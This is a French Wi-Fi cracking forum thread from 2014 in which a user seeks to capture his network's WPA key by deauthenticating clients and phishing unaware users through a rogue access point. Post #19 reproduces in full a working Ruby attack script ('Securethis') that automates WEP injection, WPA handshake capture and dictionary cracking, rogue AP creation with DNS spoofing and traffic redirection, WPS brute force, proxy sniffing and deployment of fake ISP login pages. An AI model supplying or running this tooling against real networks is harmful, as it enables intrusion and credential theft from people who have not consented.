Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-02-2014 18:45:05

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Airbase-ng

'soir

J'ai testé Airbase sur ma livebox, voici le résultat

http://imagik.fr/view/73482

Comme on le vois, je trouve tous mes appareils connectés.

D'ici, il y a moyen de récupérer la clé WPA sachant que si il le détecte ..... ?

Merci

A+

Dernière modification par airbase (03-02-2014 18:48:36)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-02-2014 19:03:14

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Airbase-ng

Bonsoir et Bienvenue wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 03-02-2014 21:44:31

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Airbase-ng

rogue AP

Hors Ligne

#4 03-02-2014 21:45:50

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

C'est à dire FFOO31 ?

Hors Ligne

#5 03-02-2014 22:01:23

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Airbase-ng

tu cherche comment mettre en place une rogue AP,
le principe est
1 de creer un faux AP similaire à l'AP de ta victime
2 déconnecter la victime pour qu'elle la forcer de se connecter à ton faux AP
3 rediriger le trafic à ton serveur.
4 creer une fausse page pour que la victime puisse entrer ces identifications.

Hors Ligne

#6 03-02-2014 22:12:33

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

Juste à partir de Airbase (comme là il trouve) on ne peut pas intercepter le mot de passe ? (26 caractères je précise)
Il y a un log qui automatise tous ça ?

Hors Ligne

#7 03-02-2014 22:18:51

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Airbase-ng

n'est pas aussi simple comme tu imagine roll

Hors Ligne

#8 04-02-2014 07:43:40

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Airbase-ng

Il m'aura fallut la réponse pour comprendre se que tu chercher a faire.

Si ta livenox accepte le wps, (ce qui est configurable dans la panel admin), tu peut aussi regarder du coté de reaver pour récuperer le pin WPS, et ainsi ta clé WPA.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#9 07-02-2014 18:30:34

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

Mon WPS est bloqué, comme toute les livebox mais vu qu'il "redirige" (pris mot à mot) et détecte les équipement cela ne voudrait pas dire qu'il intercepte la clé en même temps ?

Hors Ligne

#10 08-02-2014 03:23:24

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Airbase-ng

Quel est le modèle de ta livebox?


Si le WPS est bloqué alors il te reste les attaques par dico (bruteforce) ou effectivement les rogue AP wink
Pour les rogue AP tu as plein de tutos et d'explications sur le forum, je t'invite a y jeter un oeil et revenir sur ce topic en cas de problème, avec un descriptif précis de ton problème ( si si j'insiste la dessus roll )

Good learning !

Hors Ligne

#11 08-02-2014 15:18:16

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

C'est une livebox 2 ZTE FTTH

Si le WPS est bloqué alors il te reste les attaques par dico (bruteforce)

Mettre la clé dans le dictionnaire et ensuite comparer avec le handshake, pas vraiment d'intérêt.

Pour les rogue AP tu as plein de tutos et d'explications sur le forum, je t'invite a y jeter un oeil et revenir sur ce topic en cas de problème, avec un descriptif précis de ton problème ( si si j'insiste la dessus roll )

Je voudrais bloquer la livebox (avec aireplay -0 par exemple) et rediriger tous le monde sur mon Faux réseau, récupérant ainsi le mot de passe, ou afficher une page de phishing et 'forcer' à rentrer la clé WPA (sachant que je testerais en réel avec les membres qui utilisent le réseau, et n'étant pas au courrant, voir si c'est convainquant)

L'idéal serait via Airbase de récupérer la clé lorsque le PC demande à se connecter à mon réseau ou alors, afficher la clé que le client rentre pour se connecter à mon réseau (si il rentre MaCléWPAprivee, qu'elle s'affiche en clair)

Hors Ligne

#12 09-02-2014 11:26:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Airbase-ng

Tu as tout le matos qu'il te faut et plus encore pour faire ça sur le forum, lance une recherche avec comme mots clefs "rogue AP"
Une clef WPA n'est jamais échangé en "plain text" ( si ce n'est en forçant l'utilisateur à la rentrer sur un fake)
good learning et comme te l'as dit koala, si tu as une question qu'elle soit précise car le rogue AP - pisshing whatever inclut diverses étapes et l'utilisation croisée de plusieurs outils.

Hors Ligne

#13 09-02-2014 12:11:51

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Airbase-ng

Une simple recherche sur le forum, t'aurrait permis de trouver ce fil de discussion : http://www.crack-wifi.com/forum/topic-7 … p-wpa.html


D'ailleurs son auteur/créateur t'as repondu de maniere juste juste avant Kcdtv wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#14 09-02-2014 20:05:49

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

2008, 2011 ... Depuis 3 ans rien n'a été fait sur le sujet ? Ces tutos touchent des versions de backtrack 4, voir 5, les chemins etc ... sont obsolètes sous kali.

Il faudrait regrouper tout sur un script à exécuter et exécutable depuis Kali linux. roll

Hors Ligne

#15 09-02-2014 20:16:46

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Airbase-ng

airbase a écrit :

2008, 2011 ... Depuis 3 ans rien n'a été fait sur le sujet ? Ces tutos touchent des versions de backtrack 4, voir 5, les chemins etc ... sont obsolètes sous kali.

Il faudrait regrouper tout sur un script à exécuter et exécutable depuis Kali linux. roll

Tu ne lis pas apparement ?


Dernier message du fil du discussion : 07/12/2013

Derniere MAJ notamment fonctionnelle sous Kali : 17/04/2013 + MAJ des Fakes Pages le 16/11/2013...


Dis donc, tu veux quoi de plus qu'on en fasse un pour toi ?


Et puis, si tu cherches bien, il y a deja des scripts qui existent mais faut chercher plutôt que de balancer des messages de ce genre wink

Et puis, si tu es si fort, on attends ta version, puisque ce que l'on te propose ne te convient pas !!  wink


Sur ce, debrouille toi tout seul en ce qui me concerne, je ne prendrai pas plus de temps à te repondre wink

Dernière modification par Furyo (09-02-2014 20:18:43)


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#16 09-02-2014 20:20:15

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Airbase-ng

voir le scrypt de koala "Securethis"

Hors Ligne

#17 09-02-2014 20:31:52

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Airbase-ng

FFOO31 a écrit :

voir le scrypt de koala "Securethis"

Je lui ai mis quoi en lien plus haut ???


Tu ne le lis pas toi non plus apparement...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#18 09-02-2014 20:38:30

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Airbase-ng

le rappel est gratuit

Hors Ligne

#19 10-02-2014 16:05:50

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

ce n'est pas parceque le dernier message est de Février 2013 qu'il sera instructif.

Tu parles peut-être de ce script :

#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            " 
  
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }    
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Et j'ai bien évidemment regardé cette vidéo : http://www.dailymotion.com/user/Insideb … deo=xz2kbj afin de mieux comprendre lol

Donc tu l'enregistres et le lance ? commande etc ... tout est dans la vidéo, ou plutôt, était.

Et puis il y a autre chose qui me gêne :

airodump-ng --encrypt wep mon0

A quoi ça sert de rechercher des réseaux WEP ?

Sinon les pages de phising sont bien faites, mais là encore, comment les utiliser ?

Il n'est pas possible de mettre le script dans un fichier, plus qu'à l'exécuter ?

Entre les codes "mises à jour", les morceaux de codes et les "Le script Securethis.rb pour unbutu et autres version que backtrack", c'est confus.

Hors Ligne

#20 11-02-2014 18:46:55

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Airbase-ng

Salut,

Et j'ai bien évidemment regardé cette vidéo : http://www.dailymotion.com/user/Insideb … deo=xz2kbj afin de mieux comprendre

-1 Mon compte dailymotion a été cloturé, je l'ai indiqué il me semble dans l'autre topic

Et puis il y a autre chose qui me gêne :
airodump-ng --encrypt wep mon0

-2 Regarde les options du scripts et tu verra que il n'est pas uniquement conçu pour le WPA.

Entre les codes "mises à jour", les morceaux de codes et les "Le script Securethis.rb pour unbutu et autres version que backtrack", c'est confus.

-3 Je reconnais que ça peut porter a confusion car je suis habituellement sous d'autres version que kali ou bt du coup je fais les maj au fur et a mesure quand je change de version, ceci étant j'essai d'assurer un minimum d'aide et de support quand je le peux.

Après les 3 grosses différences dans le script entre unbutu et backtrack ou kali c'est les paquets pré-installé dans l'un et pas dans l'autre et également le bug du channel -1 présent sur les versions récentes de unbutu et non sur kali ou bt mais la encore ça peut se patcher.Sinon pour le reste il faut penser a vérifier que highline soit bien installé (voir le sujet linké plus haut)

Sinon les pages de phising sont bien faites, mais là encore, comment les utiliser ?
Il n'est pas possible de mettre le script dans un fichier, plus qu'à l'exécuter ?

-4 les pages sont dans un dossier classé par type de box me semble t-il, tu met ce dossier dans /var/www tu vérifie les droits et tu redémarre ton serveur web.Pour ta seconde question je ne te suis pas trop la.. le script s'exécute en console ou en cliquant dessus a condition de lui donner les bon droits et de le lancer correctement.

-5 Cela ne te concerne pas mais je ne fais pas de l'assistance personnalisée, le forum est fait pour ça, la personne en question se reconnaitra.

Hors Ligne

#21 18-02-2014 10:03:28

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

Salut Koala

Ce que je veux dire c'est qu'il serait bien de faire un soft (si ce n'est pas trop compliqué) où ils faille choisir, comme AirSSL : https://www.youtube.com/watch?v=HZmI56v91eo#t=89

Tu coup tu auras à choisir : ton interface > Le nom du réseau [...] > la page (free, sfr, bouyges, comme elles sont bien réalisées) à choisir.

Ainsi, comme AirSSL, tout se lancerait automatiquement.
S'ils y a une modification à faire, il suffirait de faire une autre version en 1.2 ou supérieur.

Qu'en dis-tu ?

Hors Ligne

#22 18-02-2014 10:36:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Airbase-ng

Salut smile

Excuse moi mais je vois pas énormément de différence avec le script hmm tu choisi ton option ensuite le réseau, ta carte wifi, le bssid etc... c'est a peu près pareil sauf que j'introduis pas le grab de mot de passe mais bon il faut savoir si on veut toucher au wifi uniquement ou s'attaquer aux données personnel des autres ce qui n'est pas dans mes intentions.De plus si tu as testé ou regarder le code il y a une option "Supprimer les fichiers du crack" qui te fait le ménage dans /var/www et te copie les fausses pages demander a la racine du serveur.

J'ai l'impression que tu veux du full automatique, mais si tu a testé ou regardé c'est déga bien automatisé, car faire une rogue AP tout a la main en console c'est bien pour débuter mais après ça fait vite pas mal de ligne a rentrer.

Hors Ligne

#23 18-02-2014 12:18:21

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

s'attaquer aux données personnel des autres ce qui n'est pas dans mes intentions

Moi non plus, en fait ce que je veux faire : Envoyer des désauthentifications à ma box (livebox) afin que personne ne puisse s'y connecter (ça, ça fonctionne) puis faire un réseau en parallèle et récupérer la clé.

Ton programme, je n'arrive pas à l'ouvrir hmm

Pour moi, au lieu de le faire sur kali, backtrack, linux etc ... je dirais qu'il faut le faire, uniquement sur WifiSlax (étant donné qu'il y a déjà AirrSSL, les packets doivent déjà être installés puisqu'il marche).

Je copie le Script dans un fichier 'koala.rb'
Puis le lance depuis Wifislax mais ça m'affiche le script, rien ne se lance hmm

Ce que je te conseil (si tu acceptes) c'est de reprendre le script AirSSL, et d'y ajouter les page de phishing, sous forme d'une option supplémentaire ...

Dernière modification par airbase (18-02-2014 12:19:03)

Hors Ligne

#24 18-02-2014 12:57:58

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Airbase-ng

Puis le lance depuis Wifislax mais ça m'affiche le script, rien ne se lance

Rassure moi tu a bien cocher "rendre exécutable" sinon lance le dans dans une console tel quel:

Ruby Securethis.rb

Si tu a un problème ou des erreurs détail le ici wink sur le sujet linké ci-dessus il est mentionné qu'il faut avoir "highline" d'installer vérifie aussi que c'est bon (tout est expliqué dans l'autre sujet).


Ce que je te conseil (si tu acceptes) c'est de reprendre le script AirSSL, et d'y ajouter les page de phishing, sous forme d'une option supplémentaire

Oui enfin... j'ai pas trop le temps en ce moment.

Hors Ligne

#25 18-02-2014 19:06:43

airbase
Membre
Inscription : 03-02-2014
Messages : 23

Re : Airbase-ng

Sur WifiSlax il n'y a pas 'rendre exécutable'

Sinon j'ai trouvé ça : http://www.seguridadwireless.net/videos.php

C'est à peu près la même chose, très simple aussi.

Le problème aux 2 c'est qu'il faille une connexion à internet, mais puisqu'on ne veut pas intercepter des identifiants ou autres, s'il n'y a pas de connexion ce n'est pas grave, la simple page de phishing suffit non ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]